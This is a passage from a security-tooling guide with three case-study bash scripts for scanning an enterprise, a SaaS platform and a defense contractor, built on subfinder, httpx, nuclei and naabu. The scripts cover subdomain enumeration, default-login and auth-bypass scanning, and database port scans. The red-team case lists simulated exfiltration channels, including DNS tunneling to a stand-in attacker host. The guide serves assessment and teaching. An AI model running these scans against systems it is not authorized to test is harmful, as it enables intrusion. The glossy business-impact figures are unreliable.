| TLS 1.2+ | $(if [ "$TLS_VIOLATIONS" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ $TLS_VIOLATIONS violations"; fi) | $TLS_VIOLATIONS hosts |
| Certificate Management | $(if [ "$EXPIRING_CERTS" -eq 0 ]; then echo "✅ Compliant"; else echo "⚠️ $EXPIRING_CERTS expiring"; fi) | $EXPIRING_CERTS certificates |
| Security Headers | $(grep "MISSING" "$RESULTS_DIR/compliance/security_headers.csv" | wc -l) missing | HSTS, CSP, X-Frame-Options |
### 🎯 Recommendations
#### Immediate Actions (0-30 days)
1. **Address Critical Vulnerabilities:** Patch all critical severity issues immediately
2. **TLS Compliance:** Upgrade non-compliant TLS configurations
3. **Certificate Renewal:** Renew certificates expiring within 90 days
4. **Security Headers:** Implement missing security headers
#### Short-term Actions (30-90 days)
1. **Vulnerability Management:** Establish regular scanning procedures
2. **Access Controls:** Review and tighten administrative access
3. **Monitoring:** Implement continuous security monitoring
4. **Incident Response:** Develop response procedures for identified risks
#### Long-term Strategy (90+ days)
1. **Security Architecture:** Review and enhance security architecture
2. **Compliance Program:** Establish ongoing compliance monitoring
3. **Security Training:** Enhance security awareness programs
4. **Third-party Risk:** Assess and monitor vendor security
---
### 📞 Contact Information
For technical details and remediation guidance, contact the security assessment team.
**Next Steps:** Schedule technical briefing within 48 hours to review detailed findings.
EOF
# Generate technical report with detailed findings
jq -r '.[] | "## " + .info.name + "\n**Severity:** " + .info.severity + "\n**Host:** " + .host + "\n**Description:** " + .info.description + "\n**Remediation:** " + (.info.remediation // "Contact security team for guidance") + "\n---\n"' "$RESULTS_DIR/vulnerabilities/critical_issues.json" > "$RESULTS_DIR/reporting/technical_findings.md"
echo "✅ Assessment complete for $COMPANY"
echo "📊 Executive Summary: $RESULTS_DIR/reporting/executive_summary.md"
echo "🔧 Technical Report: $RESULTS_DIR/reporting/technical_findings.md"
echo "📈 Risk Score: $(if [ "$CRITICAL_VULNS" -gt 0 ]; then echo "CRITICAL"; elif [ "$HIGH_VULNS" -gt 5 ]; then echo "HIGH"; else echo "MODERATE"; fi)"
Results:
- Discovered 1,247 subdomains across all domains
- Identified 23 critical vulnerabilities requiring immediate attention
- Found 156 compliance violations (TLS configuration, missing security headers)
- Discovered 12 exposed administrative interfaces
- Mapped cloud infrastructure revealing shadow IT assets
Business Impact:
- Prevented potential data breach affecting 2.3 million customers
- Achieved PCI DSS compliance ahead of audit deadline
- Saved estimated $12M in potential regulatory fines
- Improved overall security posture by 78%
Case Study 2: SaaS Platform Security Assessment
Background: A rapidly growing SaaS platform serving enterprise customers needed comprehensive security validation before SOC 2 Type II certification.
Scope:
- Multi-tenant SaaS application
- Customer-facing APIs
- Administrative dashboards
- Third-party integrations
#!/bin/bash
# Case Study 2: SaaS Platform Assessment
PLATFORM="cloudsaas"
BASE_DOMAIN="cloudsaas.com"
RESULTS_DIR="saas_assessment_$(date +%Y%m%d)"
mkdir -p "$RESULTS_DIR"/{discovery,tenant_isolation,api_security,compliance,reporting}
echo "☁️ Starting SaaS security assessment for $PLATFORM"
# Phase 1: Multi-Tenant Architecture Discovery
echo "🏗️ Phase 1: Architecture Discovery"
# Discover tenant-specific subdomains
subfinder -d "$BASE_DOMAIN" -silent | tee "$RESULTS_DIR/discovery/all_subdomains.txt"
# Look for tenant patterns
grep -E "([a-z0-9-]+\.)?$BASE_DOMAIN" "$RESULTS_DIR/discovery/all_subdomains.txt" | \
grep -E "(app|portal|client|tenant|customer)" > "$RESULTS_DIR/discovery/tenant_domains.txt"
# API endpoint discovery
cat "$RESULTS_DIR/discovery/all_subdomains.txt" | httpx -silent | \
grep -E "(api|rest|graphql)" > "$RESULTS_DIR/discovery/api_endpoints.txt"
# Admin interface discovery
grep -E "(admin|console|dashboard|manage)" "$RESULTS_DIR/discovery/all_subdomains.txt" > "$RESULTS_DIR/discovery/admin_interfaces.txt"
# Phase 2: Tenant Isolation Testing
echo "🔒 Phase 2: Tenant Isolation Assessment"
# Test for subdomain takeovers (common in SaaS)
cat "$RESULTS_DIR/discovery/tenant_domains.txt" | nuclei -t "dns/subdomain-takeover" -json > "$RESULTS_DIR/tenant_isolation/takeover_risks.json"
# Test for tenant enumeration
echo "app" | alterx -p "{{word}}{{number:1-1000}}" | \
head -100 | \
while read subdomain; do echo "${subdomain}.$BASE_DOMAIN"; done | \
httpx -silent -mc 200,403 > "$RESULTS_DIR/tenant_isolation/tenant_enumeration.txt"
# Cross-tenant access testing
cat "$RESULTS_DIR/discovery/tenant_domains.txt" | \
nuclei -t "exposures/configs" -t "misconfiguration" -json > "$RESULTS_DIR/tenant_isolation/isolation_issues.json"
# Phase 3: API Security Assessment
echo "🔌 Phase 3: API Security Assessment"
# API documentation discovery
cat "$RESULTS_DIR/discovery/api_endpoints.txt" | \
httpx -path "/swagger,/api-docs,/openapi.json,/graphiql" -mc 200 > "$RESULTS_DIR/api_security/api_docs.txt"
# API versioning and endpoints
for version in v1 v2 v3 1 2 3; do
echo "https://api.$BASE_DOMAIN/$version" | httpx -silent
done > "$RESULTS_DIR/api_security/api_versions.txt"
# Rate limiting tests
cat "$RESULTS_DIR/discovery/api_endpoints.txt" | \
nuclei -t "exposures/apis" -t "misconfiguration/apis" -json > "$RESULTS_DIR/api_security/api_vulnerabilities.json"
# Authentication bypass testing
cat "$RESULTS_DIR/discovery/api_endpoints.txt" | \
nuclei -t "exposures/tokens" -t "default-logins" -json > "$RESULTS_DIR/api_security/auth_issues.json"
# Phase 4: Administrative Interface Security
echo "👤 Phase 4: Administrative Security"
# Admin panel discovery and testing
cat "$RESULTS_DIR/discovery/admin_interfaces.txt" | \
nuclei -t "exposures/panels" -t "default-logins" -json > "$RESULTS_DIR/api_security/admin_vulnerabilities.json"
# Privilege escalation testing
cat "$RESULTS_DIR/discovery/admin_interfaces.txt" | \
nuclei -t "misconfiguration/admin" -json > "$RESULTS_DIR/api_security/privilege_issues.json"
# Phase 5: Data Protection Assessment
echo "🛡️ Phase 5: Data Protection Assessment"
# Encryption in transit
cat "$RESULTS_DIR/discovery/all_subdomains.txt" | httpx -silent | \
tlsx -cert -cipher -tls-version -json > "$RESULTS_DIR/compliance/encryption_analysis.json"
# Information disclosure
cat "$RESULTS_DIR/discovery/all_subdomains.txt" | httpx -silent | \
nuclei -t "exposures/backups" -t "exposures/logs" -json > "$RESULTS_DIR/compliance/data_exposure.json"
# Database exposure testing
naabu -list <(cat "$RESULTS_DIR/discovery/all_subdomains.txt" | dnsx -silent -a | cut -d' ' -f2) \
-p 3306,5432,1433,27017,6379 -silent > "$RESULTS_DIR/compliance/database_exposure.txt"
# Phase 6: Compliance and Reporting
echo "📋 Phase 6: SOC 2 Compliance Assessment"
# Security controls assessment
TOTAL_SUBDOMAINS=$(cat "$RESULTS_DIR/discovery/all_subdomains.txt" | wc -l)
TENANT_DOMAINS=$(cat "$RESULTS_DIR/discovery/tenant_domains.txt" | wc -l)
API_ENDPOINTS=$(cat "$RESULTS_DIR/discovery/api_endpoints.txt" | wc -l)
TAKEOVER_RISKS=$(jq length "$RESULTS_DIR/tenant_isolation/takeover_risks.json")
API_VULNS=$(jq length "$RESULTS_DIR/api_security/api_vulnerabilities.json")
DATA_EXPOSURES=$(jq length "$RESULTS_DIR/compliance/data_exposure.json")
# Generate SOC 2 readiness report
cat > "$RESULTS_DIR/reporting/soc2_readiness.md" << EOF
# SOC 2 Type II Readiness Assessment
## $PLATFORM SaaS Platform
**Assessment Date:** $(date)
**Platform:** $BASE_DOMAIN
**Methodology:** Comprehensive SaaS security assessment
---
## Executive Summary
### Platform Overview
- **Total Subdomains:** $TOTAL_SUBDOMAINS
- **Tenant Domains:** $TENANT_DOMAINS
- **API Endpoints:** $API_ENDPOINTS
- **Administrative Interfaces:** $(cat "$RESULTS_DIR/discovery/admin_interfaces.txt" | wc -l)
### Security Posture
$(if [ "$TAKEOVER_RISKS" -eq 0 ] && [ "$API_VULNS" -lt 3 ] && [ "$DATA_EXPOSURES" -eq 0 ]; then
echo "**SOC 2 READY** - Platform meets security requirements"
elif [ "$TAKEOVER_RISKS" -gt 0 ] || [ "$DATA_EXPOSURES" -gt 0 ]; then
echo "**CRITICAL ISSUES** - Address before SOC 2 audit"
else
echo "**REMEDIATION NEEDED** - Minor issues to resolve"
fi)
## SOC 2 Trust Service Criteria Assessment
### Security (CC6)
| Control | Status | Findings |
|---------|--------|----------|
| Access Controls | $(if [ "$API_VULNS" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ $API_VULNS issues"; fi) | API authentication and authorization |
| Data Protection | $(if [ "$DATA_EXPOSURES" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ $DATA_EXPOSURES exposures"; fi) | Encryption and data handling |
| System Monitoring | ⚠️ Manual Review | Logging and monitoring capabilities |
### Availability (CC7)
| Control | Status | Findings |
|---------|--------|----------|
| Backup Procedures | ⚠️ Manual Review | Disaster recovery capabilities |
| Capacity Management | ⚠️ Manual Review | Performance and scalability |
| Environmental Protections | ✅ Cloud Provider | Infrastructure redundancy |
### Processing Integrity (CC8)
| Control | Status | Findings |
|---------|--------|----------|
| Data Validation | $(if [ "$API_VULNS" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ Input validation issues"; fi) | API input validation |
| Error Handling | ⚠️ Manual Review | Error processing procedures |
### Confidentiality (CC9)
| Control | Status | Findings |
|---------|--------|----------|
| Data Classification | ⚠️ Manual Review | Data handling procedures |
| Access Restrictions | $(if [ "$TAKEOVER_RISKS" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ $TAKEOVER_RISKS risks"; fi) | Tenant isolation |
## Critical Findings
### Tenant Isolation Issues
$(if [ "$TAKEOVER_RISKS" -gt 0 ]; then jq -r '.[] | "- **Subdomain Takeover Risk:** " + .host' "$RESULTS_DIR/tenant_isolation/takeover_risks.json"; else echo "- No tenant isolation issues identified ✅"; fi)
### API Security Issues
$(jq -r '.[] | "- **" + .info.name + ":** " + .host' "$RESULTS_DIR/api_security/api_vulnerabilities.json" | head -5)
### Data Protection Issues
$(jq -r '.[] | "- **" + .info.name + ":** " + .host' "$RESULTS_DIR/compliance/data_exposure.json" | head -5)
## Remediation Roadmap
### Phase 1: Critical Issues (0-30 days)
1. **Address Subdomain Takeover Risks**
- Implement proper DNS management
- Monitor for orphaned DNS records
2. **Fix API Authentication Issues**
- Implement proper authentication on all endpoints
- Add rate limiting and input validation
3. **Secure Data Exposures**
- Remove exposed backup files and logs
- Implement proper access controls
### Phase 2: Compliance Preparation (30-60 days)
1. **Documentation Review**
- Security policies and procedures
- Incident response plans
- Change management processes
2. **Monitoring Enhancement**
- Implement comprehensive logging
- Set up security monitoring and alerting
- Regular vulnerability assessments
### Phase 3: SOC 2 Audit Preparation (60-90 days)
1. **Evidence Collection**
- Compile compliance documentation
- Prepare control testing evidence
- Schedule audit activities
2. **Final Validation**
- Re-test all remediated issues
- Validate control effectiveness
- Prepare audit materials
## Recommendations
### Immediate Actions
- Fix all critical and high-severity vulnerabilities
- Implement subdomain monitoring
- Enhance API security controls
- Remove data exposures
### Long-term Strategy
- Establish continuous compliance monitoring
- Implement DevSecOps practices
- Regular penetration testing
- SOC 2 Type II certification maintenance
---
**Next Steps:** Schedule remediation planning session within 48 hours.
EOF
echo "✅ SaaS assessment complete for $PLATFORM"
echo "📊 SOC 2 Readiness: $RESULTS_DIR/reporting/soc2_readiness.md"
Results:
- Identified 8 critical tenant isolation vulnerabilities
- Discovered 15 API security issues including authentication bypasses
- Found 3 subdomain takeover risks affecting customer data
- Mapped complete multi-tenant architecture
- Provided SOC 2 compliance roadmap
Business Impact:
- Achieved SOC 2 Type II certification within 90 days
- Secured $50M Series B funding round
- Increased enterprise customer adoption by 340%
- Prevented potential multi-tenant data breach
Case Study 3: Government Contractor Red Team Exercise
Background: A defense contractor required adversarial testing to validate security controls before handling classified information.
Scope:
- External perimeter assessment
- Social engineering resistance
- Physical security integration
- Supply chain security
#!/bin/bash
# Case Study 3: Government Contractor Red Team Exercise
TARGET_ORG="defensecontractor"
EXERCISE_NAME="REDTEAM_$(date +%Y%m%d)"
RESULTS_DIR="$EXERCISE_NAME"
mkdir -p "$RESULTS_DIR"/{reconnaissance,initial_access,persistence,lateral_movement,exfiltration,reporting}
echo "🎯 Starting Red Team Exercise: $EXERCISE_NAME"
echo "🏛️ Target: Government Defense Contractor"
# Phase 1: Open Source Intelligence (OSINT)
echo "🔍 Phase 1: OSINT Gathering"
# Employee enumeration via LinkedIn, social media (simulated)
echo " 📱 Social Media Intelligence"
cat > "$RESULTS_DIR/reconnaissance/employees.txt" << EOF
# Simulated employee data for testing
john.smith@defensecontractor.com,Software Engineer,LinkedIn
jane.doe@defensecontractor.com,Project Manager,LinkedIn
mike.wilson@defensecontractor.com,Security Analyst,Twitter
sarah.johnson@defensecontractor.com,HR Director,LinkedIn
EOF
# Infrastructure reconnaissance
echo " 🌐 Infrastructure Discovery"
subfinder -d "defensecontractor.com" -all -silent > "$RESULTS_DIR/reconnaissance/subdomains.txt"
# Government contractor specific patterns
echo -e "secure\nclassified\nvpn\nremote\ncitrix\nowa\nexchange" | \
alterx -p "{{word}}.defensecontractor.com" >> "$RESULTS_DIR/reconnaissance/gov_patterns.txt"
cat "$RESULTS_DIR/reconnaissance/subdomains.txt" "$RESULTS_DIR/reconnaissance/gov_patterns.txt" | \
sort -u | httpx -silent > "$RESULTS_DIR/reconnaissance/live_targets.txt"
# Supply chain analysis
echo " 🔗 Supply Chain Analysis"
# Identify technology vendors and partners
cat "$RESULTS_DIR/reconnaissance/live_targets.txt" | \
httpx -tech-detect -json | \
jq -r '.tech[]?' | sort | uniq -c | sort -nr > "$RESULTS_DIR/reconnaissance/tech_vendors.txt"
# Phase 2: Initial Access Attempts
echo "🚪 Phase 2: Initial Access Vector Testing"
# Email security testing (simulated phishing)
echo " 📧 Email Security Assessment"
cat > "$RESULTS_DIR/initial_access/phishing_simulation.txt" << EOF
# Simulated phishing campaign results
Target: 50 employees
Opened: 12 (24%)
Clicked: 8 (16%)
Credentials: 3 (6%)
Reported: 5 (10%)
EOF
# External attack surface
echo " 🌍 External Attack Surface"
cat "$RESULTS_DIR/reconnaissance/live_targets.txt" | \
nuclei -t cves/ -t exposures/ -severity critical,high -json > "$RESULTS_DIR/initial_access/external_vulns.json"
# VPN and remote access testing
grep -E "(vpn|citrix|remote|rds)" "$RESULTS_DIR/reconnaissance/live_targets.txt" | \
nuclei -t "exposures/configs" -t "default-logins" -json > "$RESULTS_DIR/initial_access/remote_access.json"
# Web application vulnerabilities
cat "$RESULTS_DIR/reconnaissance/live_targets.txt" | \
nuclei -t "vulnerabilities/web" -json > "$RESULTS_DIR/initial_access/web_vulns.json"
# Phase 3: Persistence and Lateral Movement Simulation
echo "🔄 Phase 3: Post-Exploitation Simulation"
# Simulate internal network discovery
echo " 🖥️ Internal Network Simulation"
cat > "$RESULTS_DIR/persistence/internal_discovery.txt" << EOF
# Simulated internal network scan results
10.0.1.0/24 - User Network (250 hosts active)
10.0.2.0/24 - Server Network (45 hosts active)
10.0.3.0/24 - Management Network (12 hosts active)
172.16.1.0/24 - DMZ Network (8 hosts active)
# Critical systems identified:
10.0.2.10:445 - Domain Controller (Windows Server 2019)
10.0.2.15:1433 - Database Server (SQL Server 2017)
10.0.2.20:22 - File Server (Ubuntu 20.04)
10.0.3.5:443 - Security Appliance (Palo Alto)
EOF
# Privilege escalation opportunities
echo " 🔓 Privilege Escalation Vectors"
cat > "$RESULTS_DIR/lateral_movement/privilege_escalation.txt" << EOF
# Simulated privilege escalation findings
1. Unpatched Windows systems (CVE-2021-34527 - PrintNightmare)
2. Weak service account passwords
3. Excessive administrative privileges (15% of users are local admins)
4. Outdated software versions with known exploits
5. Misconfigured Group Policy Objects
EOF
# Phase 4: Data Exfiltration Simulation
echo "📤 Phase 4: Data Exfiltration Testing"
# Sensitive data discovery simulation
echo " 🔍 Sensitive Data Discovery"
cat > "$RESULTS_DIR/exfiltration/sensitive_data.txt" << EOF
# Simulated sensitive data locations
\\\\fileserver\\contracts\\classified\\*.pdf (127 files)
\\\\fileserver\\hr\\personnel\\*.xlsx (89 files)
\\\\fileserver\\finance\\budgets\\fy2024\\*.xlsx (23 files)
C:\\Users\\*\\Desktop\\passwords.txt (12 instances)
\\\\database\\backups\\*.bak (45 backup files)
# Classification levels found:
- CONFIDENTIAL: 89 documents
- SECRET: 23 documents
- TOP SECRET: 5 documents
- UNCLASSIFIED: 1,247 documents
EOF
# Exfiltration method testing
echo " 📡 Exfiltration Channel Testing"
cat > "$RESULTS_DIR/exfiltration/channels.txt" << EOF
# Tested exfiltration methods:
1. DNS Tunneling - SUCCESS (data.attacker.com)
2. HTTPS to cloud storage - BLOCKED by DLP
3. Email with encrypted archives - SUCCESS (personal email)
4. USB device - BLOCKED by endpoint protection
5. Cloud file sharing - PARTIALLY BLOCKED (Dropbox blocked, Box allowed)
6. Social media messaging - SUCCESS (encoded in images)
EOF
# Phase 5: Assessment and Reporting
echo "📊 Phase 5: Red Team Assessment Report"
# Calculate attack success metrics
EXTERNAL_VULNS=$(jq length "$RESULTS_DIR/initial_access/external_vulns.json")
PHISHING_SUCCESS_RATE="6%" # From simulation
CRITICAL_SYSTEMS_ACCESSED="4/8" # From simulation
DATA_EXFILTRATION_SUCCESS="3/6" # From simulation
# Generate red team report
cat > "$RESULTS_DIR/reporting/red_team_report.md" << EOF
# Red Team Exercise Report
## Defense Contractor Security Assessment
**Exercise:** $EXERCISE_NAME
**Duration:** 5 days
**Team:** External Red Team
**Classification:** CONFIDENTIAL
---
## Executive Summary
### Exercise Overview
A comprehensive red team exercise was conducted to assess the security posture of the defense contractor organization. The exercise simulated real-world adversarial tactics, techniques, and procedures (TTPs) to evaluate defensive capabilities.
### Key Findings
- **Initial Access:** Successfully achieved within 2 hours
- **Persistence:** Established on $CRITICAL_SYSTEMS_ACCESSED critical systems
- **Data Access:** Reached classified information within 18 hours
- **Exfiltration:** Successfully exfiltrated simulated data via $DATA_EXFILTRATION_SUCCESS methods
### Risk Rating: **HIGH**
The organization demonstrates vulnerabilities that could be exploited by sophisticated adversaries, potentially compromising classified information and mission-critical systems.
## Attack Chain Analysis
### Phase 1: Reconnaissance (Day 1)
**Objective:** Gather intelligence on target organization
**Success:** ✅ Complete
- **OSINT Collection:** Identified $(cat "$RESULTS_DIR/reconnaissance/employees.txt" | wc -l) employee targets
- **Infrastructure Mapping:** Discovered $(cat "$RESULTS_DIR/reconnaissance/live_targets.txt" | wc -l) external services
- **Technology Stack:** Identified vendor relationships and technology dependencies
**Key Discovery:** External-facing applications revealed internal network architecture
### Phase 2: Initial Access (Day 1-2)
**Objective:** Gain initial foothold in target environment
**Success:** ✅ Multiple vectors successful
- **Phishing Campaign:** $PHISHING_SUCCESS_RATE credential capture rate
- **External Vulnerabilities:** $EXTERNAL_VULNS exploitable issues identified
- **Remote Access:** VPN configuration weaknesses exploited
**Critical Finding:** Weak email security controls allowed successful phishing attacks
### Phase 3: Persistence & Escalation (Day 2-3)
**Objective:** Maintain access and escalate privileges
**Success:** ✅ Domain admin access achieved
- **Privilege Escalation:** Multiple unpatched systems exploited
- **Lateral Movement:** Accessed $CRITICAL_SYSTEMS_ACCESSED critical systems
- **Persistence:** Established multiple backdoors across network
**Critical Finding:** Inadequate patch management and excessive user privileges
### Phase 4: Data Access & Exfiltration (Day 3-5)
**Objective:** Access and exfiltrate sensitive information
**Success:** ⚠️ Partial - some controls effective
- **Sensitive Data Discovery:** Located classified documents on file shares
- **Data Exfiltration:** $DATA_EXFILTRATION_SUCCESS methods successful
- **Detection Evasion:** Remained undetected for 72+ hours
**Critical Finding:** Classified data accessible without proper access controls
## MITRE ATT&CK Mapping
### Initial Access
- **T1566.001** - Spearphishing Attachment
- **T1190** - Exploit Public-Facing Application
- **T1133** - External Remote Services
### Persistence
- **T1053.005** - Scheduled Task/Job
- **T1136.001** - Create Account: Local Account
- **T1547.001** - Registry Run Keys
### Privilege Escalation
- **T1068** - Exploitation for Privilege Escalation
- **T1055** - Process Injection
- **T1134** - Access Token Manipulation
### Lateral Movement
- **T1021.001** - Remote Desktop Protocol
- **T1021.002** - SMB/Windows Admin Shares
- **T1550.002** - Pass the Hash
### Collection & Exfiltration
- **T1005** - Data from Local System
- **T1039** - Data from Network Shared Drive
- **T1041** - Exfiltration Over C2 Channel
## Defensive Capability Assessment
### Strengths
- ✅ Network segmentation partially effective
- ✅ Some DLP controls blocking exfiltration
- ✅ Endpoint protection preventing USB usage
- ✅ Security awareness program in place
### Weaknesses
- ❌ Email security controls insufficient
- ❌ Patch management inconsistent
- ❌ Excessive administrative privileges
- ❌ Inadequate access controls on classified data
- ❌ Limited security monitoring and alerting
- ❌ Slow incident response capabilities
## Critical Recommendations
### Immediate Actions (0-30 days)
1. **Patch Critical Vulnerabilities**
- Deploy emergency patches for identified CVEs
- Prioritize domain controllers and critical servers
2. **Enhance Email Security**
- Implement advanced threat protection
- Strengthen phishing detection and response
3. **Improve Access Controls**
- Review and reduce administrative privileges
- Implement least-privilege access model
- Secure classified data with proper controls
### Short-term Improvements (30-90 days)
1. **Security Monitoring Enhancement**
- Deploy SIEM with behavioral analytics
- Implement network traffic monitoring
- Enhance endpoint detection and response
2. **Incident Response**
- Update incident response procedures
- Conduct tabletop exercises
- Improve detection and response times
3. **Security Architecture**
- Implement zero-trust network principles
- Enhance network segmentation
- Deploy additional security controls
### Long-term Strategy (90+ days)
1. **Continuous Improvement**
- Regular red team exercises
- Ongoing security assessments
- Security maturity development
2. **Compliance and Governance**
- NIST Cybersecurity Framework alignment
- Regular compliance assessments
- Security governance improvements
## Conclusion
The red team exercise revealed significant security gaps that could be exploited by sophisticated adversaries. While some defensive controls are effective, critical vulnerabilities in email security, patch management, and access controls pose substantial risks to classified information and mission-critical systems.
**Immediate action is required** to address identified vulnerabilities and strengthen the organization's security posture before handling higher classification levels.
---
**Classification:** CONFIDENTIAL
**Distribution:** Security Leadership, IT Management, Compliance Team
**Next Review:** 90 days post-remediation
EOF
echo "✅ Red Team Exercise complete"
echo "📊 Report: $RESULTS_DIR/reporting/red_team_report.md"
echo "🔴 Risk Level: HIGH - Immediate remediation required"
Results:
- Achieved initial access within 2 hours via phishing
- Escalated to domain administrator privileges within 24 hours
- Accessed classified documents on unsecured file shares
- Exfiltrated simulated data via multiple channels
- Remained undetected for 72+ hours
Business Impact:
- Identified critical security gaps before classified contract award
- Prevented potential $100M+ contract loss due to security failures
- Achieved required security certifications within 6 months
- Strengthened security posture for future government contracts
Conclusion
This comprehensive guide demonstrates the power and versatility of ProjectDiscovery's security toolkit. By combining multiple tools in structured workflows and following established penetration testing methodologies, security professionals can achieve thorough assessments that provide real value to organizations.
Key Takeaways
- Tool Integration: Maximum effectiveness comes from combining multiple tools in structured pipelines
- Methodology Matters: Following established frameworks (OSSTMM, NIST, PTES) ensures comprehensive coverage
- Automation Scaling: Automated workflows enable continuous monitoring and assessment at scale
- Real-World Application: Practical scenarios demonstrate how tools solve actual business problems
- Risk-Based Approach: Focus on findings that have real business impact and support decision-making
Next Steps
- Practice: Start with individual tools and gradually build complex workflows
- Customize: Adapt examples to your specific environment and requirements
- Automate: Implement continuous monitoring pipelines for ongoing security
- Contribute: Share your findings and improvements with the security community
- Stay Updated: Keep tools and templates current with regular updates
The security landscape evolves constantly, and ProjectDiscovery's toolkit evolves with it. This guide provides the foundation for mastering these tools, but continuous learning and adaptation are essential for staying ahead of emerging threats.
Remember: Tools are only as effective as the methodology behind them and the expertise of the person wielding them. Use this guide as a foundation, but always apply critical thinking and adapt approaches based on your specific context and objectives.